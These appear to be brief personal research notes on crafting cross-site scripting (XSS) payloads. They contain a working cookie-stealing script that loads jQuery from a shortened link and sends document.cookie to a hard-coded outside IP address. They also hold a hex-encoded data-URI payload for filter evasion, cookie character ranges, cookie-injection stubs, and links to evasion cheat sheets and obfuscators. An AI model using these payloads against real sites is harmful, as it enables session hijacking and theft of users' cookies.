XSS

• Need an automated way to determine the constraints
• The need to design a method which can specify (payload, constraints) then generate the xss injection

#Examples

Use JQuery AJAX get request to CORS configured server

<script src='http://goo.gl/8LXprn'></script><script>$.get('http://52.13.21.28', {cookies:document.cookie})</script>

The data element can be used to encode javascript or html however it can not get cookies. The hex here is encoded using %XX and also the percent needing to be encoded to %25 in the URL.

<object data="data:text/html;hex,%253c%2573%2563%2572%2569%2570%2574%253e%2561%253c%252f%2573%2563%2572%2569%2570%2574%253e"></object>

#Jquery

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js"></script>

http://goo.gl/8LXprn

In python to URI decode

import urllib
urllib.unquote('').decode('utf8')

#Characters in cookies

###Include

0x21: !

0x23-2B: #$%&'()*+

0x2D-3A: -./0123456789:

0x3C-5B: <=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[

0x5D-7E: ]^_`abcdefghijklmnopqrstuvwxyz{|}~

###Exclude

US-ASCII characters excluding CTLs, whitespace, DQUOTE, comma, semicolon, and backslash

#Cookie Injection

##Base 64

##URI coding eval(decodeURIComponent())

#References

• https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• http://htmlpurifier.org/live/smoketests/xssAttacks.php
• http://jscompress.com/
• http://www.jsnice.org/
• http://utf-8.jp/public/jjencode.html